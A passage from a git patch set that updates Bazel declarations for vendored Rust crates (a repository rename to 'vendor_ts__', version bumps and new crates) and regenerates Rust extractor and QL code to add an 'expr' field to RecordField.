= "vendor__ungrammar-1.16.1", + name = "vendor_ts__ungrammar-1.16.1", sha256 = "a3e5df347f0bf3ec1d670aad6ca5c6a1859cd9ea61d2113125794654ccced68f", type = "tar.gz", urls = ["https://static.crates.io/crates/ungrammar/1.16.1/download"], @@ -2984,17 +3005,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__unicode-ident-1.0.14", - sha256 = "adb9e6ca4f869e1180728b7950e35922a7fc6397f7b641499e8f3ef06e50dc83", + name = "vendor_ts__unicode-ident-1.0.16", + sha256 = "a210d160f08b701c8721ba1c726c11662f877ea6b7094007e1ca9a1041945034", type = "tar.gz", - urls = ["https://static.crates.io/crates/unicode-ident/1.0.14/download"], - strip_prefix = "unicode-ident-1.0.14", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.unicode-ident-1.0.14.bazel"), + urls = ["https://static.crates.io/crates/unicode-ident/1.0.16/download"], + strip_prefix = "unicode-ident-1.0.16", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.unicode-ident-1.0.16.bazel"), ) maybe( http_archive, - name = "vendor__unicode-properties-0.1.3", + name = "vendor_ts__unicode-properties-0.1.3", sha256 = "e70f2a8b45122e719eb623c01822704c4e0907e7e426a05927e1a1cfff5b75d0", type = "tar.gz", urls = ["https://static.crates.io/crates/unicode-properties/0.1.3/download"], @@ -3004,7 +3025,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__unicode-xid-0.2.6", + name = "vendor_ts__unicode-xid-0.2.6", sha256 = "ebc1c04c71510c7f702b52b7c350734c9ff1295c464a03335b00bb84fc54f853", type = "tar.gz", urls = ["https://static.crates.io/crates/unicode-xid/0.2.6/download"], @@ -3014,7 +3035,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__unsafe-libyaml-0.2.11", + name = "vendor_ts__unsafe-libyaml-0.2.11", sha256 = "673aac59facbab8a9007c7f6108d11f63b603f7cabff99fabf650fea5c32b861", type = "tar.gz", urls = ["https://static.crates.io/crates/unsafe-libyaml/0.2.11/download"], @@ -3024,7 +3045,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__utf8parse-0.2.2", + name = "vendor_ts__utf8parse-0.2.2", sha256 = "06abde3611657adf66d383f00b093d7faecc7fa57071cce2578660c9f1010821", type = "tar.gz", urls = ["https://static.crates.io/crates/utf8parse/0.2.2/download"], @@ -3034,7 +3055,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__valuable-0.1.0", + name = "vendor_ts__valuable-0.1.0", sha256 = "830b7e5d4d90034032940e4ace0d9a9a057e7a45cd94e6c007832e39edb82f6d", type = "tar.gz", urls = ["https://static.crates.io/crates/valuable/0.1.0/download"], @@ -3044,7 +3065,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__version_check-0.9.5", + name = "vendor_ts__version_check-0.9.5", sha256 = "0b928f33d975fc6ad9f86c8f283853ad26bdd5b10b7f1542aa2fa15e2289105a", type = "tar.gz", urls = ["https://static.crates.io/crates/version_check/0.9.5/download"], @@ -3054,7 +3075,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__walkdir-2.5.0", + name = "vendor_ts__walkdir-2.5.0", sha256 = "29790946404f91d9c5d06f9874efddea1dc06c5efe94541a7d6863108e3a5e4b", type = "tar.gz", urls = ["https://static.crates.io/crates/walkdir/2.5.0/download"], @@ -3064,7 +3085,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__wasi-0.11.0-wasi-snapshot-preview1", + name = "vendor_ts__wasi-0.11.0-wasi-snapshot-preview1", sha256 = "9c8d87e72b64a3b4db28d11ce29237c246188f4f51057d65a7eab63b7987e423", type = "tar.gz", urls = ["https://static.crates.io/crates/wasi/0.11.0+wasi-snapshot-preview1/download"], @@ -3074,7 +3095,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__wasm-bindgen-0.2.99", + name = "vendor_ts__wasi-0.13.3-wasi-0.2.2", + sha256 = "26816d2e1a4a36a2940b96c5296ce403917633dff8f3440e9b236ed6f6bacad2", + type = "tar.gz", + urls = ["https://static.crates.io/crates/wasi/0.13.3+wasi-0.2.2/download"], + strip_prefix = "wasi-0.13.3+wasi-0.2.2", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.wasi-0.13.3+wasi-0.2.2.bazel"), + ) + + maybe( + http_archive, + name = "vendor_ts__wasm-bindgen-0.2.99", sha256 = "a474f6281d1d70c17ae7aa6a613c87fce69a127e2624002df63dcb39d6cf6396", type = "tar.gz", urls = ["https://static.crates.io/crates/wasm-bindgen/0.2.99/download"], @@ -3084,7 +3115,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__wasm-bindgen-backend-0.2.99", + name = "vendor_ts__wasm-bindgen-backend-0.2.99", sha256 = "5f89bb38646b4f81674e8f5c3fb81b562be1fd936d84320f3264486418519c79", type = "tar.gz", urls = ["https://static.crates.io/crates/wasm-bindgen-backend/0.2.99/download"], @@ -3094,7 +3125,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__wasm-bindgen-macro-0.2.99", + name = "vendor_ts__wasm-bindgen-macro-0.2.99", sha256 = "2cc6181fd9a7492eef6fef1f33961e3695e4579b9872a6f7c83aee556666d4fe", type = "tar.gz", urls = ["https://static.crates.io/crates/wasm-bindgen-macro/0.2.99/download"], @@ -3104,7 +3135,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__wasm-bindgen-macro-support-0.2.99", + name = "vendor_ts__wasm-bindgen-macro-support-0.2.99", sha256 = "30d7a95b763d3c45903ed6c81f156801839e5ee968bb07e534c44df0fcd330c2", type = "tar.gz", urls = ["https://static.crates.io/crates/wasm-bindgen-macro-support/0.2.99/download"], @@ -3114,7 +3145,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__wasm-bindgen-shared-0.2.99", + name = "vendor_ts__wasm-bindgen-shared-0.2.99", sha256 = "943aab3fdaaa029a6e0271b35ea10b72b943135afe9bffca82384098ad0e06a6", type = "tar.gz", urls = ["https://static.crates.io/crates/wasm-bindgen-shared/0.2.99/download"], @@ -3124,7 +3155,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__winapi-0.3.9", + name = "vendor_ts__winapi-0.3.9", sha256 = "5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419", type = "tar.gz", urls = ["https://static.crates.io/crates/winapi/0.3.9/download"], @@ -3134,7 +3165,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__winapi-i686-pc-windows-gnu-0.4.0", + name = "vendor_ts__winapi-i686-pc-windows-gnu-0.4.0", sha256 = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6", type = "tar.gz", urls = ["https://static.crates.io/crates/winapi-i686-pc-windows-gnu/0.4.0/download"], @@ -3144,7 +3175,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__winapi-util-0.1.9", + name = "vendor_ts__winapi-util-0.1.9", sha256 = "cf221c93e13a30d793f7645a0e7762c55d169dbb0a49671918a2319d289b10bb", type = "tar.gz", urls = ["https://static.crates.io/crates/winapi-util/0.1.9/download"], @@ -3154,7 +3185,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__winapi-x86_64-pc-windows-gnu-0.4.0", + name = "vendor_ts__winapi-x86_64-pc-windows-gnu-0.4.0", sha256 = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f", type = "tar.gz", urls = ["https://static.crates.io/crates/winapi-x86_64-pc-windows-gnu/0.4.0/download"], @@ -3164,7 +3195,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows-core-0.52.0", + name = "vendor_ts__windows-core-0.52.0", sha256 = "33ab640c8d7e35bf8ba19b884ba838ceb4fba93a4e8c65a9059d08afcfc683d9", type = "tar.gz", urls = ["https://static.crates.io/crates/windows-core/0.52.0/download"], @@ -3174,7 +3205,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows-sys-0.48.0", + name = "vendor_ts__windows-sys-0.48.0", sha256 = "677d2418bec65e3338edb076e806bc1ec15693c5d0104683f2efe857f61056a9", type = "tar.gz", urls = ["https://static.crates.io/crates/windows-sys/0.48.0/download"], @@ -3184,7 +3215,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows-sys-0.52.0", + name = "vendor_ts__windows-sys-0.52.0", sha256 = "282be5f36a8ce781fad8c8ae18fa3f9beff57ec1b52cb3de0789201425d9a33d", type = "tar.gz", urls = ["https://static.crates.io/crates/windows-sys/0.52.0/download"], @@ -3194,7 +3225,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows-sys-0.59.0", + name = "vendor_ts__windows-sys-0.59.0", sha256 = "1e38bc4d79ed67fd075bcc251a1c39b32a1776bbe92e5bef1f0bf1f8c531853b", type = "tar.gz", urls = ["https://static.crates.io/crates/windows-sys/0.59.0/download"], @@ -3204,7 +3235,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows-targets-0.48.5", + name = "vendor_ts__windows-targets-0.48.5", sha256 = "9a2fa6e2155d7247be68c096456083145c183cbbbc2764150dda45a87197940c", type = "tar.gz", urls = ["https://static.crates.io/crates/windows-targets/0.48.5/download"], @@ -3214,7 +3245,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows-targets-0.52.6", + name = "vendor_ts__windows-targets-0.52.6", sha256 = "9b724f72796e036ab90c1021d4780d4d3d648aca59e491e6b98e725b84e99973", type = "tar.gz", urls = ["https://static.crates.io/crates/windows-targets/0.52.6/download"], @@ -3224,7 +3255,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_aarch64_gnullvm-0.48.5", + name = "vendor_ts__windows_aarch64_gnullvm-0.48.5", sha256 = "2b38e32f0abccf9987a4e3079dfb67dcd799fb61361e53e2882c3cbaf0d905d8", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_aarch64_gnullvm/0.48.5/download"], @@ -3234,7 +3265,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_aarch64_gnullvm-0.52.6", + name = "vendor_ts__windows_aarch64_gnullvm-0.52.6", sha256 = "32a4622180e7a0ec044bb555404c800bc9fd9ec262ec147edd5989ccd0c02cd3", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_aarch64_gnullvm/0.52.6/download"], @@ -3244,7 +3275,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_aarch64_msvc-0.48.5", + name = "vendor_ts__windows_aarch64_msvc-0.48.5", sha256 = "dc35310971f3b2dbbf3f0690a219f40e2d9afcf64f9ab7cc1be722937c26b4bc", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_aarch64_msvc/0.48.5/download"], @@ -3254,7 +3285,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_aarch64_msvc-0.52.6", + name = "vendor_ts__windows_aarch64_msvc-0.52.6", sha256 = "09ec2a7bb152e2252b53fa7803150007879548bc709c039df7627cabbd05d469", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_aarch64_msvc/0.52.6/download"], @@ -3264,7 +3295,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_i686_gnu-0.48.5", + name = "vendor_ts__windows_i686_gnu-0.48.5", sha256 = "a75915e7def60c94dcef72200b9a8e58e5091744960da64ec734a6c6e9b3743e", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_i686_gnu/0.48.5/download"], @@ -3274,7 +3305,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_i686_gnu-0.52.6", + name = "vendor_ts__windows_i686_gnu-0.52.6", sha256 = "8e9b5ad5ab802e97eb8e295ac6720e509ee4c243f69d781394014ebfe8bbfa0b", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_i686_gnu/0.52.6/download"], @@ -3284,7 +3315,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_i686_gnullvm-0.52.6", + name = "vendor_ts__windows_i686_gnullvm-0.52.6", sha256 = "0eee52d38c090b3caa76c563b86c3a4bd71ef1a819287c19d586d7334ae8ed66", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_i686_gnullvm/0.52.6/download"], @@ -3294,7 +3325,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_i686_msvc-0.48.5", + name = "vendor_ts__windows_i686_msvc-0.48.5", sha256 = "8f55c233f70c4b27f66c523580f78f1004e8b5a8b659e05a4eb49d4166cca406", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_i686_msvc/0.48.5/download"], @@ -3304,7 +3335,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_i686_msvc-0.52.6", + name = "vendor_ts__windows_i686_msvc-0.52.6", sha256 = "240948bc05c5e7c6dabba28bf89d89ffce3e303022809e73deaefe4f6ec56c66", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_i686_msvc/0.52.6/download"], @@ -3314,7 +3345,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_x86_64_gnu-0.48.5", + name = "vendor_ts__windows_x86_64_gnu-0.48.5", sha256 = "53d40abd2583d23e4718fddf1ebec84dbff8381c07cae67ff7768bbf19c6718e", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_x86_64_gnu/0.48.5/download"], @@ -3324,7 +3355,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_x86_64_gnu-0.52.6", + name = "vendor_ts__windows_x86_64_gnu-0.52.6", sha256 = "147a5c80aabfbf0c7d901cb5895d1de30ef2907eb21fbbab29ca94c5b08b1a78", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_x86_64_gnu/0.52.6/download"], @@ -3334,7 +3365,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_x86_64_gnullvm-0.48.5", + name = "vendor_ts__windows_x86_64_gnullvm-0.48.5", sha256 = "0b7b52767868a23d5bab768e390dc5f5c55825b6d30b86c844ff2dc7414044cc", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_x86_64_gnullvm/0.48.5/download"], @@ -3344,7 +3375,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_x86_64_gnullvm-0.52.6", + name = "vendor_ts__windows_x86_64_gnullvm-0.52.6", sha256 = "24d5b23dc417412679681396f2b49f3de8c1473deb516bd34410872eff51ed0d", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_x86_64_gnullvm/0.52.6/download"], @@ -3354,7 +3385,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_x86_64_msvc-0.48.5", + name = "vendor_ts__windows_x86_64_msvc-0.48.5", sha256 = "ed94fce61571a4006852b7389a063ab983c02eb1bb37b47f8272ce92d06d9538", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_x86_64_msvc/0.48.5/download"], @@ -3364,7 +3395,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_x86_64_msvc-0.52.6", + name = "vendor_ts__windows_x86_64_msvc-0.52.6", sha256 = "589f6da84c646204747d1270a2a5661ea66ed1cced2631d546fdfb155959f9ec", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_x86_64_msvc/0.52.6/download"], @@ -3374,17 +3405,27 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__winnow-0.6.24", - sha256 = "c8d71a593cc5c42ad7876e2c1fda56f314f3754c084128833e64f1345ff8a03a", + name = "vendor_ts__winnow-0.7.3", + sha256 = "0e7f4ea97f6f78012141bcdb6a216b2609f0979ada50b20ca5b52dde2eac2bb1", type = "tar.gz", - urls = ["https://static.crates.io/crates/winnow/0.6.24/download"], - strip_prefix = "winnow-0.6.24", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.winnow-0.6.24.bazel"), + urls = ["https://static.crates.io/crates/winnow/0.7.3/download"], + strip_prefix = "winnow-0.7.3", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.winnow-0.7.3.bazel"), ) maybe( http_archive, - name = "vendor__yansi-1.0.1", + name = "vendor_ts__wit-bindgen-rt-0.33.0", + sha256 = "3268f3d866458b787f390cf61f4bbb563b922d091359f9608842999eaee3943c", + type = "tar.gz", + urls = ["https://static.crates.io/crates/wit-bindgen-rt/0.33.0/download"], + strip_prefix = "wit-bindgen-rt-0.33.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.wit-bindgen-rt-0.33.0.bazel"), + ) + + maybe( + http_archive, + name = "vendor_ts__yansi-1.0.1", sha256 = "cfe53a6657fd280eaa890a3bc59152892ffa3e30101319d168b781ed6529b049", type = "tar.gz", urls = ["https://static.crates.io/crates/yansi/1.0.1/download"], @@ -3394,7 +3435,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__zerocopy-0.7.35", + name = "vendor_ts__zerocopy-0.7.35", sha256 = "1b9b4fd18abc82b8136838da5d50bae7bdea537c574d8dc1a34ed098d6c166f0", type = "tar.gz", urls = ["https://static.crates.io/crates/zerocopy/0.7.35/download"], @@ -3404,7 +3445,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__zerocopy-derive-0.7.35", + name = "vendor_ts__zerocopy-0.8.20", + sha256 = "dde3bb8c68a8f3f1ed4ac9221aad6b10cece3e60a8e2ea54a6a2dec806d0084c", + type = "tar.gz", + urls = ["https://static.crates.io/crates/zerocopy/0.8.20/download"], + strip_prefix = "zerocopy-0.8.20", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.zerocopy-0.8.20.bazel"), + ) + + maybe( + http_archive, + name = "vendor_ts__zerocopy-derive-0.7.35", sha256 = "fa4f8080344d4671fb4e831a13ad1e68092748387dfc4f55e356242fae12ce3e", type = "tar.gz", urls = ["https://static.crates.io/crates/zerocopy-derive/0.7.35/download"], @@ -3412,56 +3463,66 @@ def crate_repositories(): build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.zerocopy-derive-0.7.35.bazel"), ) + maybe( + http_archive, + name = "vendor_ts__zerocopy-derive-0.8.20", + sha256 = "eea57037071898bf96a6da35fd626f4f27e9cee3ead2a6c703cf09d472b2e700", + type = "tar.gz", + urls = ["https://static.crates.io/crates/zerocopy-derive/0.8.20/download"], + strip_prefix = "zerocopy-derive-0.8.20", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.zerocopy-derive-0.8.20.bazel"), + ) + return [ - struct(repo = "vendor__anyhow-1.0.95", is_dev_dep = False), - struct(repo = "vendor__argfile-0.2.1", is_dev_dep = False), - struct(repo = "vendor__chrono-0.4.39", is_dev_dep = False), - struct(repo = "vendor__clap-4.5.26", is_dev_dep = False), - struct(repo = "vendor__dunce-1.0.5", is_dev_dep = False), - struct(repo = "vendor__either-1.13.0", is_dev_dep = False), - struct(repo = "vendor__encoding-0.2.33", is_dev_dep = False), - struct(repo = "vendor__figment-0.10.19", is_dev_dep = False), - struct(repo = "vendor__flate2-1.0.35", is_dev_dep = False), - struct(repo = "vendor__glob-0.3.2", is_dev_dep = False), - struct(repo = "vendor__globset-0.4.15", is_dev_dep = False), - struct(repo = "vendor__itertools-0.14.0", is_dev_dep = False), - struct(repo = "vendor__lazy_static-1.5.0", is_dev_dep = False), - struct(repo = "vendor__mustache-0.9.0", is_dev_dep = False), - struct(repo = "vendor__num-traits-0.2.19", is_dev_dep = False), - struct(repo = "vendor__num_cpus-1.16.0", is_dev_dep = False), - struct(repo = "vendor__proc-macro2-1.0.93", is_dev_dep = False), - struct(repo = "vendor__quote-1.0.38", is_dev_dep = False), - struct(repo = "vendor__ra_ap_base_db-0.0.258", is_dev_dep = False), - struct(repo = "vendor__ra_ap_cfg-0.0.258", is_dev_dep = False), - struct(repo = "vendor__ra_ap_hir-0.0.258", is_dev_dep = False), - struct(repo = "vendor__ra_ap_hir_def-0.0.258", is_dev_dep = False), - struct(repo = "vendor__ra_ap_hir_expand-0.0.258", is_dev_dep = False), - struct(repo = "vendor__ra_ap_ide_db-0.0.258", is_dev_dep = False), - struct(repo = "vendor__ra_ap_intern-0.0.258", is_dev_dep = False), - struct(repo = "vendor__ra_ap_load-cargo-0.0.258", is_dev_dep = False), - struct(repo = "vendor__ra_ap_parser-0.0.258", is_dev_dep = False), - struct(repo = "vendor__ra_ap_paths-0.0.258", is_dev_dep = False), - struct(repo = "vendor__ra_ap_project_model-0.0.258", is_dev_dep = False), - struct(repo = "vendor__ra_ap_span-0.0.258", is_dev_dep = False), - struct(repo = "vendor__ra_ap_stdx-0.0.258", is_dev_dep = False), - struct(repo = "vendor__ra_ap_syntax-0.0.258", is_dev_dep = False), - struct(repo = "vendor__ra_ap_vfs-0.0.258", is_dev_dep = False), - struct(repo = "vendor__rayon-1.10.0", is_dev_dep = False), - struct(repo = "vendor__regex-1.11.1", is_dev_dep = False), - struct(repo = "vendor__serde-1.0.217", is_dev_dep = False), - struct(repo = "vendor__serde_json-1.0.135", is_dev_dep = False), - struct(repo = "vendor__serde_with-3.12.0", is_dev_dep = False), - struct(repo = "vendor__syn-2.0.96", is_dev_dep = False), - struct(repo = "vendor__toml-0.8.19", is_dev_dep = False), - struct(repo = "vendor__tracing-0.1.41", is_dev_dep = False), - struct(repo = "vendor__tracing-flame-0.2.0", is_dev_dep = False), - struct(repo = "vendor__tracing-subscriber-0.3.19", is_dev_dep = False), - struct(repo = "vendor__tree-sitter-0.24.6", is_dev_dep = False), - struct(repo = "vendor__tree-sitter-embedded-template-0.23.2", is_dev_dep = False), - struct(repo = "vendor__tree-sitter-ruby-0.23.1", is_dev_dep = False), - struct(repo = "vendor__triomphe-0.1.14", is_dev_dep = False), - struct(repo = "vendor__ungrammar-1.16.1", is_dev_dep = False), - struct(repo = "vendor__rand-0.8.5", is_dev_dep = True), - struct(repo = "vendor__tree-sitter-json-0.24.8", is_dev_dep = True), - struct(repo = "vendor__tree-sitter-ql-0.23.1", is_dev_dep = True), + struct(repo = "vendor_ts__anyhow-1.0.96", is_dev_dep = False), + struct(repo = "vendor_ts__argfile-0.2.1", is_dev_dep = False), + struct(repo = "vendor_ts__chrono-0.4.39", is_dev_dep = False), + struct(repo = "vendor_ts__clap-4.5.31", is_dev_dep = False), + struct(repo = "vendor_ts__dunce-1.0.5", is_dev_dep = False), + struct(repo = "vendor_ts__either-1.14.0", is_dev_dep = False), + struct(repo = "vendor_ts__encoding-0.2.33", is_dev_dep = False), + struct(repo = "vendor_ts__figment-0.10.19", is_dev_dep = False), + struct(repo = "vendor_ts__flate2-1.1.0", is_dev_dep = False), + struct(repo = "vendor_ts__glob-0.3.2", is_dev_dep = False), + struct(repo = "vendor_ts__globset-0.4.15", is_dev_dep = False), + struct(repo = "vendor_ts__itertools-0.14.0", is_dev_dep = False), + struct(repo = "vendor_ts__lazy_static-1.5.0", is_dev_dep = False), + struct(repo = "vendor_ts__mustache-0.9.0", is_dev_dep = False), + struct(repo = "vendor_ts__num-traits-0.2.19", is_dev_dep = False), + struct(repo = "vendor_ts__num_cpus-1.16.0", is_dev_dep = False), + struct(repo = "vendor_ts__proc-macro2-1.0.93", is_dev_dep = False), + struct(repo = "vendor_ts__quote-1.0.38", is_dev_dep = False), + struct(repo = "vendor_ts__ra_ap_base_db-0.0.266", is_dev_dep = False), + struct(repo = "vendor_ts__ra_ap_cfg-0.0.266", is_dev_dep = False), + struct(repo = "vendor_ts__ra_ap_hir-0.0.266", is_dev_dep = False), + struct(repo = "vendor_ts__ra_ap_hir_def-0.0.266", is_dev_dep = False), + struct(repo = "vendor_ts__ra_ap_hir_expand-0.0.266", is_dev_dep = False), + struct(repo = "vendor_ts__ra_ap_ide_db-0.0.266", is_dev_dep = False), + struct(repo = "vendor_ts__ra_ap_intern-0.0.266", is_dev_dep = False), + struct(repo = "vendor_ts__ra_ap_load-cargo-0.0.266", is_dev_dep = False), + struct(repo = "vendor_ts__ra_ap_parser-0.0.266", is_dev_dep = False), + struct(repo = "vendor_ts__ra_ap_paths-0.0.266", is_dev_dep = False), + struct(repo = "vendor_ts__ra_ap_project_model-0.0.266", is_dev_dep = False), + struct(repo = "vendor_ts__ra_ap_span-0.0.266", is_dev_dep = False), + struct(repo = "vendor_ts__ra_ap_stdx-0.0.266", is_dev_dep = False), + struct(repo = "vendor_ts__ra_ap_syntax-0.0.266", is_dev_dep = False), + struct(repo = "vendor_ts__ra_ap_vfs-0.0.266", is_dev_dep = False), + struct(repo = "vendor_ts__rayon-1.10.0", is_dev_dep = False), + struct(repo = "vendor_ts__regex-1.11.1", is_dev_dep = False), + struct(repo = "vendor_ts__serde-1.0.218", is_dev_dep = False), + struct(repo = "vendor_ts__serde_json-1.0.139", is_dev_dep = False), + struct(repo = "vendor_ts__serde_with-3.12.0", is_dev_dep = False), + struct(repo = "vendor_ts__syn-2.0.98", is_dev_dep = False), + struct(repo = "vendor_ts__toml-0.8.20", is_dev_dep = False), + struct(repo = "vendor_ts__tracing-0.1.41", is_dev_dep = False), + struct(repo = "vendor_ts__tracing-flame-0.2.0", is_dev_dep = False), + struct(repo = "vendor_ts__tracing-subscriber-0.3.19", is_dev_dep = False), + struct(repo = "vendor_ts__tree-sitter-0.24.6", is_dev_dep = False), + struct(repo = "vendor_ts__tree-sitter-embedded-template-0.23.2", is_dev_dep = False), + struct(repo = "vendor_ts__tree-sitter-ruby-0.23.1", is_dev_dep = False), + struct(repo = "vendor_ts__triomphe-0.1.14", is_dev_dep = False), + struct(repo = "vendor_ts__ungrammar-1.16.1", is_dev_dep = False), + struct(repo = "vendor_ts__rand-0.9.0", is_dev_dep = True), + struct(repo = "vendor_ts__tree-sitter-json-0.24.8", is_dev_dep = True), + struct(repo = "vendor_ts__tree-sitter-ql-0.23.1", is_dev_dep = True), ] From cbae16b3928ad1770fa55ec06d69d5fb9534e4de Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Tue, 25 Feb 2025 13:29:17 +0100 Subject: [PATCH 032/892] Rust: rerun code generation --- rust/extractor/src/generated/.generated.list | 2 +- rust/extractor/src/generated/top.rs | 4 ++++ rust/extractor/src/translate/generated.rs | 2 ++ rust/ql/.generated.list | 11 ++++++----- rust/ql/.gitattributes | 1 + rust/ql/lib/codeql/rust/elements/RecordField.qll | 1 + .../elements/internal/generated/ParentChild.qll | 11 ++++++++--- .../rust/elements/internal/generated/Raw.qll | 5 +++++ .../elements/internal/generated/RecordField.qll | 14 ++++++++++++++ rust/ql/lib/rust.dbscheme | 6 ++++++ .../generated/RecordField/RecordField.ql | 9 ++++++--- .../generated/RecordField/RecordField_getExpr.ql | 7 +++++++ rust/schema/ast.py | 1 + 13 files changed, 62 insertions(+), 12 deletions(-) create mode 100644 rust/ql/test/extractor-tests/generated/RecordField/RecordField_getExpr.ql diff --git a/rust/extractor/src/generated/.generated.list b/rust/extractor/src/generated/.generated.list index 6aaea33eac5c..528da1d56714 100644 --- a/rust/extractor/src/generated/.generated.list +++ b/rust/extractor/src/generated/.generated.list @@ -1,2 +1,2 @@ mod.rs 4bcb9def847469aae9d8649461546b7c21ec97cf6e63d3cf394e339915ce65d7 4bcb9def847469aae9d8649461546b7c21ec97cf6e63d3cf394e339915ce65d7 -top.rs 18702be33d768cc6f723201fce8c2bf2125df192c0336db9711a99f8fa7b074f 18702be33d768cc6f723201fce8c2bf2125df192c0336db9711a99f8fa7b074f +top.rs da0f43b99d3a173520048275597e2b052a7351f6fcb2ad5fc912257976742bb7 da0f43b99d3a173520048275597e2b052a7351f6fcb2ad5fc912257976742bb7 diff --git a/rust/extractor/src/generated/top.rs b/rust/extractor/src/generated/top.rs index fe5a9cd8ee38..2774193823aa 100644 --- a/rust/extractor/src/generated/top.rs +++ b/rust/extractor/src/generated/top.rs @@ -2185,6 +2185,7 @@ impl From> for trap::Label { pub struct RecordField { pub id: trap::TrapId, pub attrs: Vec>, + pub expr: Option>, pub name: Option>, pub type_repr: Option>, pub visibility: Option>, @@ -2200,6 +2201,9 @@ impl trap::TrapEntry for RecordField { for (i, v) in self.attrs.into_iter().enumerate() { out.add_tuple("record_field_attrs", vec![id.into(), i.into(), v.into()]); } + if let Some(v) = self.expr { + out.add_tuple("record_field_exprs", vec![id.into(), v.into()]); + } if let Some(v) = self.name { out.add_tuple("record_field_names", vec![id.into(), v.into()]); } diff --git a/rust/extractor/src/translate/generated.rs b/rust/extractor/src/translate/generated.rs index dc4828e078f9..249027eefa92 100644 --- a/rust/extractor/src/translate/generated.rs +++ b/rust/extractor/src/translate/generated.rs @@ -1849,12 +1849,14 @@ impl Translator<'_> { pub(crate) fn emit_record_field(&mut self, node: ast::RecordField) -> Option> { if self.should_be_excluded(&node) { return None; } let attrs = node.attrs().filter_map(|x| self.emit_attr(x)).collect(); + let expr = node.expr().and_then(|x| self.emit_expr(x)); let name = node.name().and_then(|x| self.emit_name(x)); let type_repr = node.ty().and_then(|x| self.emit_type(x)); let visibility = node.visibility().and_then(|x| self.emit_visibility(x)); let label = self.trap.emit(generated::RecordField { id: TrapId::Star, attrs, + expr, name, type_repr, visibility, diff --git a/rust/ql/.generated.list b/rust/ql/.generated.list index c8195b8a7664..6e7a2892a418 100644 --- a/rust/ql/.generated.list +++ b/rust/ql/.generated.list @@ -131,7 +131,7 @@ lib/codeql/rust/elements/RangePat.qll b5c0cfc84b8a767d58593fa7102dcf4be3ff8b02ba lib/codeql/rust/elements/RecordExpr.qll b8541a33ef408f2070103c1db8b6ec845bc6b1d8c810f5d8d208e5eeb9f86b30 a6d9602a64c9acf48f033f06fe7e1d86382512fd378ee3044f1126726847f696 lib/codeql/rust/elements/RecordExprField.qll edac04146849e2aeca27e7bbb896c21aa2e2b15736b1e8a06ac51ab01433b3ac 7c062bd6d5dd5b1d972450fb0b3272cd9b45f94ccd668c3bd4347e2dce3279ed 